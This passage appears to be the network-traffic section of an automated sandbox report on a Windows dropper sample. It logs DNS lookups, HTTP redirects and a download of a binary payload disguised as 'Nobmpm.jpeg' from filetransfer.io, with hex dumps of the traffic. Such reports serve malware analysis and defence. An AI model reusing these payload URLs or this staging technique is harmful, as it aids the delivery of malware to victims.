                                  Nov 29, 2022 16:56:46.235873938 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.235888958 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.235918045 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.235939980 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.236419916 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.236439943 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.236527920 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.236545086 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.236598015 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.236771107 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.236790895 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.236844063 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.236891985 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.236901999 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.236942053 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.237268925 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.237289906 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.237349033 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.237366915 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.237402916 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.237425089 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.237623930 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.237642050 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.237689972 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.237703085 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.237732887 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.237760067 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.238181114 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.238238096 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.238292933 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.238307953 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.238343000 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.238365889 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.238504887 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.238539934 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.238583088 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.238595963 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.238624096 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.238647938 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.254038095 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.254071951 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.254195929 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.254234076 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.254281998 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.254736900 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.254810095 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.254872084 CET49701443192.168.2.4188.114.96.3
                                  TimestampSource PortDest PortSource IPDest IP
                                  Nov 29, 2022 16:55:21.169269085 CET5657253192.168.2.48.8.8.8
                                  Nov 29, 2022 16:55:21.194606066 CET53565728.8.8.8192.168.2.4
                                  Nov 29, 2022 16:55:21.368020058 CET5091153192.168.2.48.8.8.8
                                  Nov 29, 2022 16:55:21.396821976 CET53509118.8.8.8192.168.2.4
                                  Nov 29, 2022 16:55:22.575531006 CET5968353192.168.2.48.8.8.8
                                  Nov 29, 2022 16:55:22.599168062 CET53596838.8.8.8192.168.2.4
                                  Nov 29, 2022 16:56:45.100804090 CET6416753192.168.2.48.8.8.8
                                  Nov 29, 2022 16:56:45.120352983 CET53641678.8.8.8192.168.2.4
                                  Nov 29, 2022 16:56:45.211761951 CET5856553192.168.2.48.8.8.8
                                  Nov 29, 2022 16:56:45.234453917 CET53585658.8.8.8192.168.2.4
                                  Nov 29, 2022 16:56:45.671900034 CET5223953192.168.2.48.8.8.8
                                  Nov 29, 2022 16:56:45.697882891 CET53522398.8.8.8192.168.2.4
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Nov 29, 2022 16:55:21.169269085 CET192.168.2.48.8.8.80x9ca1Standard query (0)filetransfer.ioA (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:55:21.368020058 CET192.168.2.48.8.8.80x77b4Standard query (0)filetransfer.ioA (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:55:22.575531006 CET192.168.2.48.8.8.80x4146Standard query (0)s23.filetransfer.ioA (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:56:45.100804090 CET192.168.2.48.8.8.80xd143Standard query (0)filetransfer.ioA (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:56:45.211761951 CET192.168.2.48.8.8.80x9144Standard query (0)filetransfer.ioA (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:56:45.671900034 CET192.168.2.48.8.8.80xfc94Standard query (0)s23.filetransfer.ioA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Nov 29, 2022 16:55:21.194606066 CET8.8.8.8192.168.2.40x9ca1No error (0)filetransfer.io188.114.96.3A (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:55:21.194606066 CET8.8.8.8192.168.2.40x9ca1No error (0)filetransfer.io188.114.97.3A (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:55:21.396821976 CET8.8.8.8192.168.2.40x77b4No error (0)filetransfer.io188.114.96.3A (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:55:21.396821976 CET8.8.8.8192.168.2.40x77b4No error (0)filetransfer.io188.114.97.3A (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:55:22.599168062 CET8.8.8.8192.168.2.40x4146No error (0)s23.filetransfer.io188.114.97.3A (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:55:22.599168062 CET8.8.8.8192.168.2.40x4146No error (0)s23.filetransfer.io188.114.96.3A (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:56:45.120352983 CET8.8.8.8192.168.2.40xd143No error (0)filetransfer.io188.114.96.3A (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:56:45.120352983 CET8.8.8.8192.168.2.40xd143No error (0)filetransfer.io188.114.97.3A (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:56:45.234453917 CET8.8.8.8192.168.2.40x9144No error (0)filetransfer.io188.114.97.3A (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:56:45.234453917 CET8.8.8.8192.168.2.40x9144No error (0)filetransfer.io188.114.96.3A (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:56:45.697882891 CET8.8.8.8192.168.2.40xfc94No error (0)s23.filetransfer.io188.114.96.3A (IP address)IN (0x0001)false
                                  Nov 29, 2022 16:56:45.697882891 CET8.8.8.8192.168.2.40xfc94No error (0)s23.filetransfer.io188.114.97.3A (IP address)IN (0x0001)false
                                  • filetransfer.io
                                  • s23.filetransfer.io
                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.2.449696188.114.96.3443C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  TimestampkBytes transferredDirectionData


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  1192.168.2.449697188.114.97.3443C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  TimestampkBytes transferredDirectionData


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  2192.168.2.449700188.114.97.3443C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  TimestampkBytes transferredDirectionData


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  3192.168.2.449701188.114.96.3443C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  TimestampkBytes transferredDirectionData


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  4192.168.2.449695188.114.96.380C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  TimestampkBytes transferredDirectionData
                                  Nov 29, 2022 16:55:21.281394958 CET93OUTGET /data-package/XK4aNvBX/download HTTP/1.1
                                  Host: filetransfer.io
                                  Connection: Keep-Alive
                                  Nov 29, 2022 16:55:21.351871014 CET94INHTTP/1.1 301 Moved Permanently
                                  Date: Tue, 29 Nov 2022 15:55:21 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Location: https://filetransfer.io/data-package/XK4aNvBX/download
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NITGh66ABxbp8Jk2XVq6Y6CZ410eF3%2BbPd8rb%2BpJ42ynnKsg6Jy9Qwk7DXxPl%2F9u6v%2Bta6f30gx21Fw5D1IBv3SfDcp2vLJxW1pRzg9hAGNgU10MknMOq4Nn08BcXsxW%2Bn4%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 771c86f20b2ecafd-DUS
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                  Nov 29, 2022 16:55:21.351898909 CET94INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  5192.168.2.449699188.114.96.380C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  TimestampkBytes transferredDirectionData
                                  Nov 29, 2022 16:56:45.144578934 CET2922OUTGET /data-package/XK4aNvBX/download HTTP/1.1
                                  Host: filetransfer.io
                                  Connection: Keep-Alive
                                  Nov 29, 2022 16:56:45.209618092 CET2923INHTTP/1.1 301 Moved Permanently
                                  Date: Tue, 29 Nov 2022 15:56:45 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Location: https://filetransfer.io/data-package/XK4aNvBX/download
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1vnDGmZMQ1wX1iVZN4MXRIHJh6qn8QASVVCcwcLJ%2FSJCnaz8sEXJgc2vjxnBWFspgPnPIjXpfNTR3sdA1KOxuVlrag1EzeLjVQeV%2BQJdCA9KqRmgaL3GwRilD60CmJEISAY%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 771c88fe289fbb41-FRA
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                  Nov 29, 2022 16:56:45.209645033 CET2923INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.2.449696188.114.96.3443C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  TimestampkBytes transferredDirectionData
                                  2022-11-29 15:55:21 UTC0OUTGET /data-package/XK4aNvBX/download HTTP/1.1
                                  Host: filetransfer.io
                                  Connection: Keep-Alive
                                  2022-11-29 15:55:22 UTC0INHTTP/1.1 302 Found
                                  Date: Tue, 29 Nov 2022 15:55:22 GMT
                                  Content-Type: text/html; charset=utf-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  X-Frame-Options: SAMEORIGIN
                                  Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly
                                  Set-Cookie: PHPSESSID=0c59d59d6bee539cda6ccbb80d2c42fd; expires=Tue, 13-Dec-2022 15:55:22 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  Vary: X-Requested-With
                                  Location: https://s23.filetransfer.io/storage/download/1tQUp1sCtsBK
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aHEvyJ5IiCAww%2BtN9MeROXgft4MaQOrtnfH6oMeIozKYhmnRjSSyaloa1kVQiZ1%2BkMi6ZhfYiAT1zumkf0M47FmGcgUoaq4E7pKrnkZ1uIv5RZ3dyHiTK3XrNruea9SWYnU%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 771c86f64d83697b-FRA
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  2022-11-29 15:55:22 UTC1INData Raw: 38 30 0d 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 0a 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 33 2e 66 69 6c 65 74 72 61 6e 73 66 65 72 2e 69 6f 2f 73 74 6f 72 61 67 65 2f 64 6f 77 6e 6c 6f 61 64 2f 31 74 51 55 70 31 73 43 74 73 42 4b 22 3e 50 6c 65 61 73 65 20 63 6c 69 63 6b 20 68 65 72 65 20 74 6f 20 63 6f 6e 74 69 6e 75 65 3c 2f 61 3e 2e 3c 2f 70 3e 0d 0a
                                  Data Ascii: 80<h1>Redirect</h1><p><a href="https://s23.filetransfer.io/storage/download/1tQUp1sCtsBK">Please click here to continue</a>.</p>
                                  2022-11-29 15:55:22 UTC1INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  1192.168.2.449697188.114.97.3443C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  TimestampkBytes transferredDirectionData
                                  2022-11-29 15:55:22 UTC1OUTGET /storage/download/1tQUp1sCtsBK HTTP/1.1
                                  Host: s23.filetransfer.io
                                  Connection: Keep-Alive
                                  2022-11-29 15:55:22 UTC1INHTTP/1.1 200 OK
                                  Date: Tue, 29 Nov 2022 15:55:22 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 2244112
                                  Connection: close
                                  Last-Modified: Tue, 29 Nov 2022 10:55:16 GMT
                                  Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly
                                  Set-Cookie: PHPSESSID=55d144527b0bcf6da01dfd094e1dc536; expires=Tue, 13-Dec-2022 15:55:22 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Content-Disposition: attachment; filename="Nobmpm.jpeg"
                                  Accept-Ranges: bytes
                                  Accept-Ranges: bytes
                                  ETag: "6385e514-223e10"
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BLm3XKoqFwGU8DK9EJBDFnY3Lqtth1y9GvcFlx9stuKtC3Vbw10FEC0pzIpekweTH3cnZ1Ktwl8N71GM3xLPrQXfO6FipxCCHi%2BEGLxgrBaHPScB5rIhOzvOzJZViWu8FM0xgNdX"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 771c86faf9b29116-FRA
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  2022-11-29 15:55:22 UTC2INData Raw: f9 8c de 01 75 9c 59 af bb a6 57 8a b5 68 d4 1b 00 2e 09 97 0d 34 f6 0a a2 e9 b1 70 11 ad 0e c9 06 fe 32 20 35 5c 26 59 60 d0 c2 fa 43 df 66 20 02 92 78 a1 41 02 74 85 00 14 ce 1d b0 10 84 3e cd fa f0 ef ec b3 49 72 44 c7 66 70 43 5b 73 ca 94 27 81 9e bb 86 6a 49 1a c5 66 b5 92 ac ea a4 99 9d eb 41 82 d4 a3 a5 57 75 eb ab a9 bc 02 a8 86 e5 18 01 5a 89 56 c8 6c 45 ba 0a 59 9f 89 3d 63 8b 3a 52 66 5e 71 66 5d 2a a8 a1 8c 45 04 59 78 eb e6 c6 c1 5e e5 c5 36 a1 d2 75 83 48 04 08 09 f7 dc 10 fd f8 a1 0c 8f 47 74 fa c9 7f ce 39 99 79 44 87 0e 9b e9 4e fb dd 68 b7 43 48 94 ad 29 4f 4c 22 bb d9 a2 13 7b 4b 83 61 16 f4 3f 2d e8 49 cc b8 34 64 f9 fd 1e 74 16 ff 81 db 5a 2b d5 9a 2b 36 2b 20 97 4f f8 35 f9 18 e8 bf 03 b2 05 94 ae eb 05 86 a2 86 c5 c7 2e 9b 2e a5 3c
                                  Data Ascii: uYWh.4p2 5\&Y`Cf xAt>IrDfpC[s'jIfAWuZVlEY=c:Rf^qf]*EYx^6uHGt9yDNhCH)OL"{Ka?-I4dtZ++6+ O5..<
                                  2022-11-29 15:55:22 UTC2INData Raw: 2c 5d 40 f7 17 9b 5d bd 0c 36 07 d6 d3 79 41 d5 24 82 f2 6b 14 17 54 a5 aa 88 19 49 fd 01 6b cb 54 3d c4 11 5c 34 ae 24 32 4d b9 f1 4a 5f c2 c3 3e ad 96 c0 f6 69 64 7a 08 64 6a d9 8b a1 fa 34 64 7c cb 68 5d d2 e5 98 56 fd 76 88 07 6f 3b ae fa 29 92 41 fa 69 30 a5 8a cc 4c 6b 18 06 c5 81 a0 4d 17 18 2f 69 d0 dc 39 d7 67 6b 8d 0d af ee a5 fd da 45 8d ba db de a7 f3 4f fd 61 51 44 95 ae a0 b1 c4 97 3f 85 6d 0c ae 31 44 1d 2f d8 4d 27 08 23 9c 22 bd 8d e8 0a cd f0 cf 29 38 0e 03 82 c4 02 bd 26 d4 b7 78 77 9c c3 ed 11 3a 51 aa e9 24 f3 ae 5f 09 0b 4e fe c9 6f 00 a9 e2 5e af 29 e0 7e b8 53 94 9a 4e 0e 61 d7 b5 89 ae cb d7 98 dd 98 32 61 37 ba d5 a3 80 26 e0 8c 77 8a c8 8f 7f 79 89 28 45 75 8d fe c7 2b 5c ca 10 44 c1 6a 65 14 46 b8 39 0d dc e8 06 10 07 09 f6 0c
                                  Data Ascii: ,]@]6yA$kTIkT=\4$2MJ_>idzdj4d|h]Vvo;)Ai0LkM/i9gkEOaQD?m1D/M'#")8&xw:Q$_No^)~SNa2a7&wy(Eu+\DjeF9
                                  2022-11-29 15:55:22 UTC4INData Raw: 18 db 90 ad 8b ce ea 62 bb 37 ba 01 d0 0e 8b 8e 36 89 f7 61 2a 30 9e f7 4b c9 fc 8b 11 86 26 50 38 ac a1 8b c6 9c b4 f3 db f0 fe 81 97 8c d7 88 d5 36 a3 fd 58 cd 2e f1 5b 06 db e2 6b bb 57 6e ea 6b 2a 39 ea 0c a9 9d 31 2e 5e 6e 70 a5 1f e1 26 a8 02 78 64 23 c4 08 51 d7 8d 82 81 fe b3 ac c3 78 c5 72 a2 21 47 65 f7 39 c1 68 74 fb 56 59 05 0a 1a 4c 4d 1d 6d 5b 19 7f 35 d8 29 00 03 c7 9f 4d 3b 6f 11 34 ef 6a 72 ef 83 d6 e5 78 8a 16 40 28 b3 1e 4a 6d 9a e6 ab bf 57 7c 03 83 6a ba 87 c9 4c a2 98 23 48 ff 6b ea 1c a7 65 8e eb fc 90 4b 8d bc 5c 7c 26 b1 92 89 63 c9 d5 73 4a 8f d7 06 8b 5c 7f 7c a0 19 28 ad 94 bc d4 07 da cd 43 fe dd 08 16 b6 59 89 1d b5 70 97 c3 63 44 26 b0 67 ed 98 d8 3d 9a 00 0e e4 58 55 fe ff 2f da 87 88 b6 43 41 1b 20 24 e3 98 85 4c 08 5e a1
                                  Data Ascii: b76a*0K&P86X.[kWnk*91.^np&xd#Qxr!Ge9htVYLMm[5)M;o4jrx@(JmW|jL#HkeK\|&csJ\|(CYpcD&g=XU/CA $L^
                                  2022-11-29 15:55:22 UTC5INData Raw: 25 62 b4 28 e5 6b 38 08 3c 5c 74 01 7f b1 b9 62 6a fa 6a eb 8a 3d 0c c8 83 a7 68 ff 3b a1 c5 f6 83 7f e0 2d ed 1b 56 b5 c6 4f 8b 3d 9e 63 0a 4a d8 18 1a 63 3a 7c 05 f4 3b 5e 7d d7 9a 52 4c 96 4f 6d d3 a2 50 6d a2 9e 5d ef df 41 6e db 68 47 3e dc 47 90 06 2e 7f ac 71 52 90 0c 90 5f 67 65 0a b9 aa 2a 9f a8 3d d1 4f 59 54 7a 35 22 37 db 58 e7 76 33 3f 08 b4 c5 30 38 69 1c d1 68 c7 63 73 c9 e5 80 99 7c 4e a2 5c ec a9 f9 5b 46 e6 8a 06 64 62 af 47 34 4d bf 34 c3 81 c8 82 22 a6 f1 75 76 78 ef 07 7f ba f9 d7 a8 72 16 71 f9 ce 81 46 25 69 06 c1 92 be b9 f3 91 37 87 e6 15 75 ee c8 77 e8 20 4b 91 ff b9 9e b0 8d ab 71 f7 b8 3f 24 10 96 1c 28 b3 eb ac 57 1e 80 08 97 7d ad 4c 4f 74 f7 01 52 dd ce f8 06 a8 3c f6 df 40 ba 3d b4 c5 f7 59 0a 90 90 d1 4f 35 3e 6b 22 cd 53
                                  Data Ascii: %b(k8<\tbjj=h;-VO=cJc:|;^}RLOmPm]AnhG>G.qR_ge*=OYTz5"7Xv3?08ihcs|N\[FdbG4M4"uvxrqF%i7uw Kq?$(W}LOtR<@=YO5>k"S
                                  2022-11-29 15:55:22 UTC6INData Raw: 01 2d 06 f0 cb 79 43 c7 c6 0b 43 e7 45 c3 6f d0 34 21 8d cc 24 d4 d2 8c 13 4b bf b9 36 67 fd e7 37 ed 98 68 a3 5c 84 2c 07 ab b0 56 8a f7 ad 86 36 09 c7 b7 e6 a0 35 ca 6d 75 68 c0 19 b0 a4 b1 2b 6a 82 71 45 cd 93 9e f1 70 06 bc 33 f6 7e 4f c9 e2 4e 9c b8 fc 18 44 29 4b 0c 6f 21 d6 a8 f9 1a 39 5f 9f 1c 98 a5 fe 4c 78 d9 8c b6 b4 fe aa 04 ad 39 dd 89 f6 9a 4a 15 7a f1 62 95 52 cd 7b bb d7 46 58 3c 63 a8 4f 62 6d a5 1e 07 77 9e de 01 66 18 88 b7 61 22 1b 68 75 0d b2 d1 70 65 9d 52 ef 84 49 d9 19 85 11 2a 0d 97 23 ee b9 4f 13 39 e5 41 98 b6 5e 69 78 e8 a2 07 51 27 e1 4f 3b 97 3a 94 e1 88 d2 8f c1 5e 7d 77 26 42 d0 f1 e9 62 1e 96 5a 63 8b ca db 3c c8 09 77 e9 f8 43 3b c4 74 63 75 00 a2 22 f7 8e 7e f1 bb 87 21 89 5c 2f 90 ec d7 45 20 76 3d 07 91 a3 51 9c 4e 7d
                                  Data Ascii: -yCCEo4!$K6g7h\,V65muh+jqEp3~OND)Ko!9_Lx9JzbR{FX<cObmwfa"hupeRI*#O9A^ixQ'O;:^}w&BbZc<wC;tcu"~!\/E v=QN}
                                  2022-11-29 15:55:22 UTC8INData Raw: 81 5e 70 d1 18 d0 b3 18 12 3a c5 ab 06 b6 1c 7d 32 3d e1 ab 38 58 1d 4d 85 6b 2b 62 bf a2 18 db 16 4c 17 07 85 1a b4 25 64 a1 dd cf ec 5f b7 33 74 86 6c 00 4f 79 c0 cc d4 5f ef d9 da 58 08 1b 19 2f eb 2f e0 82 54 fb 13 f5 d9 cb f5 57 7f 33 5f eb 8f c5 3d ad 5c 99 3c bf 85 1d 07 b1 c7 6c ce 48 03 6f 6b 63 52 c1 e9 3e 67 5f 75 33 c5 7c 5d d4 3e a0 22 16 50 c8 b4 9a 3f a1 95 0d 17 9e 86 22 4e fa bd 84 22 60 77 06 99 98 33 82 a1 e6 aa a2 04 aa 16 35 14 54 6e c0 b9 2d 1d 9f 36 6b 3d f0 9b 21 ad 11 3e 88 57 43 48 99 bd 9e 3e 65 16 ef a0 79 8f c7 7e 87 f8 54 a0 c4 ff c1 4d bf 93 c6 d3 ee 0e c6 14 69 e5 5a 1d 16 36 77 47 92 fe ca 36 1d 37 7c 3a f9 0a f7 40 f7 88 17 53 d5 fb 1d 62 5e 62 e7 7c 61 ed 06 8e a1 9b 52 47 f8 6c 96 90 7e 3e 7f 18 d6 4f 95 ae 66 b1 0f 58
                                  Data Ascii: ^p:}2=8XMk+bL%d_3tlOy_X//TW3_=\<lHokcR>g_u3|]>"P?"N"`w35Tn-6k=!>WCH>ey~TMiZ6wG67|:@Sb^b|aRGl~>OfX
                                  2022-11-29 15:55:22 UTC9INData Raw: 4b c6 25 75 f0 8b 68 bf 6f 9e 87 aa 1b 25 a6 82 41 a4 33 3d bb 06 5b 37 73 19 09 cf 43 59 ef c3 d5 50 5e 3f be 02 37 d0 e7 b5 74 f9 11 24 2d ef 6e a9 74 49 54 cf 67 06 67 9f 2d ee 6e a0 e0 81 3f 5d c0 46 4f eb 9f 03 36 c5 16 fa f7 d0 bc fe 75 12 5f 39 56 0e 39 56 83 fe d0 de 81 79 42 a3 de 6b ba 0e bb e2 a6 bf a7 b4 3f 3a 43 80 c9 4e ef b2 8f c4 6d ba 27 73 c6 4d 33 94 55 69 81 38 91 4a 83 1e 75 92 ed 8f 73 ca 6b ea 92 6b 9e 3e f0 67 40 88 2d d1 a3 1a 87 e3 6d 02 c1 9c 86 d6 af e0 eb 9d 6f 60 45 82 74 13 40 e0 9e 08 23 33 77 60 a5 bd e4 d0 f7 72 5a 23 aa f4 89 41 2a 17 1f 76 fe af a4 18 53 bf 07 c3 54 03 79 66 33 2a 83 01 14 8a 2d 1f 99 2d a7 55 8c 76 84 57 4b 2c f2 9e 3f e3 2c cc 72 a3 d7 02 0d 97 bc 6f 34 64 2e 19 b3 78 6a cd 74 79 6f ac 7d c7 3b 0b d5
                                  Data Ascii: K%uho%A3=[7sCYP^?7t$-ntITgg-n?]FO6u_9V9VyBk?:CNm'sM3Ui8Juskk>g@-mo`Et@#3w`rZ#A*vSTyf3*--UvWK,?,ro4d.xjtyo};
